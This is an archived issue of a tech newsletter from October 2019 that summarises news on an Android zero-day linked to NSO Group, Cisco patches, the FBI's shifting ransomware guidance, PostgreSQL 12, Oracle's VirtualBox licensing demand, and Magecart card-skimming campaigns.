The Truth: Android Zero-Day, The Feds Say Pay Ransomware If You Must, Oracle on a Fishing Expedition

Friday, 4 October 2019

Welcome to The Truth, we wrap up the week with a zero-day in Android, the FBI changing their stance on ransomware (again) and Oracle wanting money for software from someone who isn’t running it. Read all about it here.

There’s a zero-day in Android: “Attackers are exploiting a vulnerability that can give them full control of at least 18 different phone models, including four different Pixel models, a member of Google’s Project Zero research group said on Thursday night.” Apparently it’s being used by notorious Israeli spyware-for-hire developers NSO Group, probably to spy on people. The company is denying this, of course. According to Ars Technica, the “exploits require little or no customization to fully root vulnerable phones.” Google reportedly wants to fix this in the October security update for Android that should be arriving in a few days. As usual, no telling when these patches land on non-Pixel devices.

Cisco has issued software updates to mitigate 18 security vulnerabilities in its ASA, FMC and FTD software. All of the vulnerabilities are given a “high” impact rating, the highest CVSS Base Score listed is 8.8.

At dawn of the global ransomware wave, the FBI made headlines by telling victims to “just pay” the ransom demands because in most cases, so they said, that would be your only hope to get your data back. If you didn’t have backups, that is. Cottoning on to the fact that this meant more people would be paying criminals, which in turn would mean the criminals' business would flourish, which then would then mean more ransomware, the FBI later reversed this stance and told people to never pay the ransom demanded by the criminals. It’s seems they have, again, reconsidered: “The Bureau has posted an updated version of the guidance it offers for companies on how to handle ransomware demands with a section discussing the option of paying the hackers to get data decrypted. In short, the FBI still says that companies should not cave to hacker demands and pay to have their data unlocked, but the bureau acknowledges that paying is an option.”

PostgreSQL 12 has been released. Headline features include better performance, the ability to rebuild database indexes concurrently, improved authentication via SSL and more.

Oracle wants $12,200 from a UK company for using the VirtualBox Extension Pack. Here’s the kicker: The company says it’s not using any of Oracle’s products. “Oracle provided the company with a range of IP addresses, more than 100, that it claimed had been using its proprietary VirtualBox Extension Pack in conjunction with VirtualBox installations.” Apparently the company owns the IP range, but since it’s a network service provider, some of the IPs are used by its customers. Oracle, it seems, doesn’t care and hasn’t gotten back to the company or The Register, which is reporting on this story, with an explanation. There’s suspicion that this is all a “fishing expedition” by Oracle to get data on the people who are actually using those IP addresses. It seems that Oracle’s proprietary extension to the GPL-licensed VirtualBox hypervisor is phoning home.

Magecart, a type of malware that affects online shop software at the point of sale and extracts credit card or other payment information via malware that’s embedded right into vulnerable shop software (often from software provider Magento), is still going strong. In a recent survey, security researchers found 573 different command & control server domains receiving data from almost 10,000 compromised hosts. They found more than two million different instances of malicious JavaScript binaries of the Magecart type. So the next time a credit card of yours gets compromised, you know how it most likely happened.

Well, that’s The Truth for this week. See you for the next edition on Monday. Until then, enjoy the weekend! In honour of Android, here’s your weekend song: Zero Day by MC Frontalot.

This is an archived issue of my daily newsletter FOXTROT/ALFA. You can find more information about it, including how to subscribe via email, on this page.